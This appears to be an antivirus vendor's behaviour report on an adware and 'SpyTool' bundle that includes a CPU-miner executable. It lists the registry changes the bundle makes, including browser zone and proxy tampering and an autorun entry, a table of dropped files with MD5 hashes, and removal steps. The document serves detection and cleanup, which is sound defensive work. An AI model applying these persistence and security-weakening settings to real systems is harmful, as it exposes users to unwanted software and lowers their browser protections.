[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsr18.tmp:1388 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 37 10 41 23 A8 F2 36 B5 E4 65 07 39 26 91 CC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process nsr18.tmp:460 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1F.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB D9 4A F0 50 51 09 45 AB C5 90 4F 84 B3 59 64"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsx27.tmp:1340 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F F3 AD 45 EF 40 02 11 55 96 3E CC A3 8E 26 4A"
The process nsx27.tmp:336 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Tutorials\updv]
"Version" = "15.09.24"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"HelpLink" = "http://re.gamesdesktop.com"
"Inno Setup: User" = "%CurrentUserName%"
"QuietUninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe /SILENT"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: App Path" = "%Program Files%\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"UninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"InstallDate" = "20150925"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoRepair" = "1"
"InstallLocation" = "%Program Files%\gmsd_re_005010096\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLInfoAbout" = "http://re.gamesdesktop.com"
[HKCU\Software\TutoTag]
"OnceInstalled" = "re"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Publisher" = "GAMESDESKTOP"
[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft]
"Tinstalls" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Language" = "re"
[HKCU\Software\Microsoft\Tinstalls]
"20150925" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"DisplayName" = "GamesDesktop 092.005010096"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Icon Group" = "GAMESDESKTOP"
[HKLM\SOFTWARE\GAMESDESKTOP\gmsd_re_005010096]
"PathInstall" = "%Program Files%\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLUpdateInfo" = "http://re.gamesdesktop.com"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 32 AB F8 CD F8 EC 84 FC 22 D0 64 83 02 35 F8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoModify" = "1"
"Inno Setup: Setup Version" = "5.5.6 (a)"
[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
"OnceInstalled2" = "re"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe"
The SpyTool deletes the following registry key(s):
[HKCU\Software\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA848-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
[HKCU\Software\Microsoft\Active Setup\Installed Components]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{4b218e3e-bc98-4770-93d3-2731b9329278}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
The process encrypt.exe:1700 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 7D 9D B9 4D 8F EA 30 C9 CE C1 FC DE 74 0E 9B"
The process encrypt.exe:1364 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 15 B5 48 15 CA 7D A4 AD 44 2C 75 64 52 88 B2"
The process encrypt.exe:1564 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 87 5B 1D 77 67 56 E5 9D 8D FD B8 6B 93 95 00"
The process encrypt.exe:496 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA DB 0A BE AD B7 ED C6 D3 F7 DD 09 FF 91 71 8C"
The process %original file name%.exe:860 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 1C 77 55 34 FE BA A2 FB D1 9A 65 68 45 8C B9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsd41.tmp:816 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 70 1D BA 92 0B 65 B0 3C 6B 23 E8 3D D8 44 8C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process nsk6.tmp:496 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 9B 39 A8 5A CA 30 F0 7B 6A E4 0A 94 E2 A9 56"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-som-tot-cpm-opw-crr"
The process nsqA.tmp:508 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 1A CD 5D 3A 8E 83 F8 03 9F 3C 23 1F 40 31 02"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\5517\setup.exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\8819.exe |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc1C.tmp\registry.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi1F.tmp\registry.dll |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\inetc.dll |
cf3c49ebab2b29f65fe80ec349072d99 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr18.tmp |
5925c8698cc2f0f44edc9f5dd61fc7cd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr21.tmp |
fce81f5d5e6baabe8eb9f87a1bb3599c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsrD.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss25.tmp\registry.dll |
029aa26a0dd5ef7bd1ba1639703f8fae | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
5925c8698cc2f0f44edc9f5dd61fc7cd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\Bundle_CPUminer[1].exe |
5c9336efb1faf577655bcd88a444c26b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\CESwN2Es[1].exe |
cf3c49ebab2b29f65fe80ec349072d99 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Bundle_OperaRUnew[1].exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\setup[1].exe |
d4937ebdbcea35fc0f12233e57c30ca4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\cmmdWriter[1].exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe |
e6b0bc04dca07169abfc4456c4671307 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll |
0bcd0698977726a660321b4fec8f4a5e | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll |
6d64fd7d8a69a39ed4ddcf0cd8d26b4b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll |
72f70472e350b35290839f3e2802b4f4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll |
c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll |
634ec1dc874c89711b94b5c279987d66 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe |
6e98034de60d2e96b4bbb148bbeabadb | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll |
17baa5fcf3b9206cc0395a7cc38be7ac | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll |
2b8929f7edc2df8925066cb0e7067365 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll |
a25f20a5664891bc292970bd23acbf21 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll |
302f011627a16ce5555e39ec53d4fbdd | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll |
814cb49f7706f681723ea9b5746987e4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe |
90871478e7b9765cccb884751bfafc7b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll |
4120c792ee30c922d95c5201cedade29 | c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
upgmsd_re_005010096.exe:1928
gmsd_re_005010096.exe:740
nsk15.tmp:1340
nsj35.tmp:588
8819.exe:368
nssF.tmp:1488
setup.exe:828
taskkill.exe:1408
taskkill.exe:248
taskkill.exe:1092
wmic.exe:1336
amisid.exe:496
amisid.exe:600
tasklist.exe:1852
tasklist.exe:492
nsr18.tmp:1388
nsr18.tmp:460
nsx27.tmp:1340
nsx27.tmp:336
encrypt.exe:1700
encrypt.exe:1364
encrypt.exe:1564
encrypt.exe:496
%original file name%.exe:860
nsd41.tmp:816
nsk6.tmp:496
nsqA.tmp:508 - Delete the original SpyTool file.
- Delete or disinfect the following files created/modified by the SpyTool:
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
